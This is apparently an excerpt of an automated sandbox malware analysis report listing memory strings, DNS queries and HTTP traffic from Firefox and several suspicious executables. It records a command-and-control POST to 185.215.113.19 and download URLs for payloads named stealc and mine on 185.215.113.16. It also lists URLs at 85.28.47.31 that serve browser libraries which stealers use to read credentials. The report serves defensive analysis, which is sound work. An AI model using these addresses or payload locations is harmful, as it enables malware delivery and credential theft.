Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: devtools.performance.recording.ui-base-urldevtools/client/framework/devtools-browser@mozilla.org/uriloader/handler-service;1^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?devtools.debugger.remote-websocketbrowser.fixup.domainsuffixwhitelist.Got invalid request to save JSON dataresource://devtools/server/devtools-server.jsUnable to start devtools server on get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URIFailed to listen. Listener already attached.get FIXUP_FLAG_FORCE_ALTERNATE_URI@mozilla.org/network/protocol;1?name=filereleaseDistinctSystemPrincipalLoaderNo callback set for this channel.@mozilla.org/network/protocol;1?name=default@mozilla.org/dom/slow-script-debug;1browser.fixup.dns_first_for_single_words{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}WebChannel/this._originCheckCallbackJSON Viewer's onSave failed in startPersistence^([a-z+.-]+:\/{0,3})([^\/@]+@).+Failed to listen. Callback argument missing.devtools.performance.popup.feature-flagdevtools/client/framework/devtoolsFailed to execute WebChannel callback:^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]\|$)DevToolsStartup.jsm:handleDebuggerFlagDevTools telemetry entry point failed: resource://devtools/shared/security/socket.jsbrowser.urlbar.dnsResolveFullyQualifiedNamesresource://gre/modules/ExtHandlerService.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1http://www.inbox.lv/rfc2368/?value=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/NetUtil.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}resource://gre/modules/FileUtils.sys.mjs_finalizeInternal/this._finalizePromise<extractScheme/fixupChangedProtocol<@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1http://compose.mail.yahoo.co.jp/ym/Compose?To=%shandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjshttps://mail.inbox.lv/compose?to=%s@mozilla.org/uriloader/dbus-handler-app;1Scheme should be either http or https_injectDefaultProtocolHandlersIfNeededhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/network/file-input-stream;1Can't invoke URIFixup in the content processgecko.handlerService.defaultHandlersVersionhttps://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.pl/mh/?mailto=%sisDownloadsImprovementsAlreadyMigratedresource://gre/modules/DeferredTask.sys.mjs@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLhttps://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%s@mozilla.org/network/simple-stream-listener;1First argument should be an nsIInputStreamNon-zero amount of bytes must be specifiedhttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://poczta.interia.pl/mh/?mailto=%snewChannel requires a single object argumenthttps://mail.inbox.lv/compose?to=%spdfjs.pre
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: dom.sitepermsaddon-provider.enabledonPrefEnabledChanged() - adding gmp directory onPrefEMEGlobalEnabledChanged() id= - the given reason to update is not supportedmedia.gmp-manager.secondsBetweenChecksipc:first-content-process-createdstartup - adding clearkey CDM failedfindUpdates() - found update for This should only be called from XPCShell testsstartup - adding gmp directory failed with startup - adding clearkey CDM directory webcompat-reporter@mozilla.org.xpiFileUtils_openSafeFileOutputStreamwebcompat-reporter%40mozilla.org:1.5.1FileUtils_closeSafeFileOutputStream@mozilla.org/network/file-output-stream;1resource://gre/modules/addons/XPIProvider.jsmhttps://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svg://track.adform.net/serving/scripts/trackpoint/://c.amazon-adsystem.com/aax2/apstag.js://cdn.branch.io/branch-latest.min.js://auth.9c9media.ca/auth/main.js://static.chartbeat.com/js/chartbeat.jspictureinpicture%40mozilla.org:1.0.0@mozilla.org/network/atomic-file-output-stream;1@mozilla.org/addons/addon-manager-startup;1://static.criteo.net/js/ld/publishertag.jsFileUtils_openAtomicFileOutputStream://.imgur.io/js/vendor..bundle.js://www.everestjs.net/static/st.v3.js@mozilla.org/network/safe-file-output-stream;1://pub.doubleverify.com/signals/pub.js://www.rva311.com/static/js/main..chunk.js://web-assets.toggl.com/app/assets/scripts/.js://connect.facebook.net//sdk.js*://static.chartbeat.com/js/chartbeat_video.js://connect.facebook.net//all.jsresource://gre/modules/FileUtils.sys.mjs://libs.coremetrics.com/eluminate.js://.imgur.com/js/vendor..bundle.jsresource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: get serviceWorkersTestingEnabledhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3324817796.0000028631391000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: gram Fles\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreport equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp, 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp, 1c593ec106.exe, 0000000C.00000002.2941021583.000000000240C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account7 equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account= equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 0000001F.00000002.2963560119.0000000006D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account>mJ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account@ equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountI equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountQ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account` equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountmain/nimbus-desktop-experimentsmain/nimbus-desktop-experimentsupgrade-spotlight-rolloutserp-ad-telemetry-rollouthttpSpeculativeParallelLimitmain/nimbus-desktop-experimentsINVALID_SHAREABLE_SCHEMES equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountt equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountw equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2939170613.00000000021CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account} equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000003.2579353074.000001CBE7979000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2578648250.000001CBE796C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2581052147.000001CBE797A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set suspendMediaWhenInactivehttps://www.youtube.com/accountbrowser-delayed-startup-finishedauthorStyleDisabledDefaultresetLocationChangeRateLimitget authorStyleDisabledDefaultbrowsing-context-discardedset authorStyleDisabledDefaultserviceWorkersTestingEnabledgetAllBrowsingContextsInSubtreeget serviceWorkersTestingEnabledhttps://www.youtube.com/accounttoolkit.singletonWindowType_downloadTypesViewableInternally_shouldViewDownloadInternally/<getMostRecentBrowserWindowpreviousHandler.preferredAction.PREF_BRANCH_PREVIOUS_ACTIONgetCurrentInnerWindowWithIdhttps://www.youtube.com/account@mozilla.org/browser/clh;1PREF_BRANCH_WAS_REGISTEREDnotifyStartDelayedAutoplayMediawebcompat-reporter@mozilla.orgWeb Compatibility Interventions equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: toolkit/global/browser-utils.ftlhttp://www.w3.org/1999/xlinkSERP Ad Telemetry RollouthttpSpeculativeParallelLimithttpSpeculativeParallelLimitmain/nimbus-desktop-experimentsfirefox-desktop-urlbar-release-9main/nimbus-desktop-experimentsmain/nimbus-desktop-experimentszero-prefix-weather-suggestionsmain/nimbus-desktop-experimentsmain/nimbus-desktop-experimentshttps://www.youtube.com/accountmain/nimbus-desktop-experimentsserp-ad-telemetry-rolloutzero-prefix-weather-suggestions equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2640278303.000033E224400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2640278303.000033E224400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2640278303.000033E224400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/accountZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3334627067.0000028631DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x.S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xabout:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2630851621.00000238F37C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F3769000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3769000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2625566496.00000238E7667000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exeN
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/stealc/random.exe
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/stealc/random.execodediD
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Local
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php(
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php1
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php17001
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php2
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php:N
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpM:S
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpl
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phplh
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpp
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpta
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/ViewSizePreferences.SourceAumid
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/fac00b58987e8fcf7b8c730804042ba5ce902415450#=
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp, 8ec8c5c339.exe, 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/3w
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php-w6
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php.?i
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php6
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpA
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpE
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpJ
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpQ
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpSQ
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpV?
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpZ
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpa
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpaY
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpb
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpj
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpjQ
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpo
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpwQ
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpx
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpywB
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll9
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dlly
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll=
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dllF
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000046A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/Iw
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/Qwj
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/al
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/cwx
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024FA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/l
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/r
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31EC
Source: 8ec8c5c339.exe, 00000008.00000002.2740205336.000000000249E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31FZSAi
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31Wi
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31p
Source: firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shandlerSvc
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dev.w3.org/html5/spec/rendering.html#rendering
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
